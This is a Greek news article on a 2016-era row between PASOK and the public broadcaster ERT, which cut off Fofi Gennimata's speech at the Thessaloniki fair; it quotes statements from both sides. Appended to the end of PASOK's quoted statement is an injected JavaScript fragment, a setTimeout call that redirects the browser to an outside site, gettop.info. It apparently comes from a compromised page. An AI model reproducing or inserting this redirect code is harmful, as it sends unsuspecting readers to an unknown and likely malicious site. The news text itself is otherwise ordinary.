Πόλεμος ανακοινώσεων για το «μαύρο» της ΕΡΤ στη Γεννηματά στη ΔΕΘ

0
8

 

Έντονη ήταν η αντίδραση του ΠΑΣΟΚ στη διακοπη μετάδοσης της ομιλίας της Φώφης Γεννηματά στη ΔΕΘ. Με επιστολή τους ο εκπρόσωπος και ο διευθυντής του Γραφείου Τύπου της Χαριλάου Τρικούπη καταγγέλλουν την ΕΡΤ αναφέροντας πως: «Είναι η πρώτη φορά που ομιλία αρχηγού κόμματος δεν προβάλλεται ολοκληρωμένη από τη δημόσια τηλεόραση στο πλαίσιο της Διεθνούς Έκθεσης Θεσσαλονίκης».

Το ΠΑΣΟΚ έχει ζητήσει η ομιλία να μεταδοθεί ολόκληρη το βράδυ της Τρίτης.

Από την πλευρά της η ΕΡΤ στην απάντηση της ανέφερε:
– Πέμπτη 8 Σεπτεμβρίου: Το Γραφείο Τύπου του ΠΑΣΟΚ ενημερώνει εγγράφως την ΕΡΤ ότι η κυρία Γεννηματά θα μιλήσει στο Βελλίδειο τη Δευτέρα 12 Σεπτεμβρίου στις 20.00.

– Παρασκευή 9 Σεπτεμβρίου: Με νέο σημείωμα, η ΕΡΤ ενημερώνεται εγγράφως ότι η ομιλία της κυρίας Γεννηματά θα αρχίσει στις 19.30.

Παρά τον συμφωνημένο προγραμματισμό, η χθεσινή ομιλία της κυρίας Γεννηματά άρχισε στις 20.35. Η ΕΡΤ τη μετέδωσε μέχρι και τις 20.57, οπότε και έπρεπε να διακόψει για τη μετάδοση του κεντρικού δελτίου ειδήσεων.

Απόδειξη ότι στις προθέσεις της ΕΡΤ δεν ήταν η περιορισμένη μετάδοση της ομιλίας της κυρίας Γεννηματά, αποτελεί το γεγονός ότι στα δελτία ειδήσεων της ίδιας ημέρας, όσο και της επομένης, μεταδόθηκαν εκτενή ρεπορτάζ. Η ΕΡΤ κάλυψε επίσης, όλες τις δραστηριότητες της κυρίας Γεννηματά στη ΔΕΘ και προσέφερε εικόνα σε όλα τα ιδιωτικά κανάλια.

Η ΕΡΤ θεωρεί άδικη την κατηγορία του Γραφείου Τύπου του ΠΑΣΟΚ και είναι πάντα ανοιχτή για να φιλοξενήσει τον οποιοδήποτε πολιτικό αρχηγό».

Το ΠΑΣΟΚ «σήκωσε το γάντι» και ανταπάντησε στη δημόσια τηλεόραση κάνοντας αναφορά σε «εποχές ΥΕΝΕΔ».

Ειδικότερα, στην ανακοίνωση αναφέρεται:

«Η Δημόσια Τηλεόραση της δήθεν αριστερής διακυβέρνησης μεταδίδει ολόκληρη την ομιλία του αρχηγού της Χρυσής Αυγής και κόβει τη Φώφη Γεννηματά.

Είναι και αυτό μια νέα αντίληψη, νέα ήθη.

Η διοίκηση της ΕΡΤ μα και η ίδια η κυβέρνηση οφείλουν να απαντήσουν: Πότε κόπηκε στον αέρα ομιλία πολιτικού αρχηγού στη ΔΕΘ; Πόσο χρόνο δικαιούται η Πρόεδρος του ΠΑΣΟΚ και επικεφαλής της Δημοκρατικής Συμπαράταξης; Μόνο 22 λεπτά που η ίδια αναγνωρίζει;

Θυμίζουμε, για να γίνουν οι απαραίτητες συγκρίσεις ότι το Σάββατο διέλυσαν το πρόγραμμα τους επί 3 ώρες (!) περιμένοντας τον κ. Τσίπρα και μεταδίδοντας ολόκληρη τη μακρά ομιλία του. Προφανώς κατόπιν εντολής των γνωστών για τα «δημοκρατικές» συμπεριφορές, επιτελών του Μαξίμου.

Φαίνεται ότι κάποιοι ξέχασαν ότι έχει παρέλθει η εποχή της ΥΕΝΕΔ.

Σε κάθε περίπτωση ευχαριστούμε τη διοίκηση της ΕΡΤ για τη «φιλοξενία» της…» setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here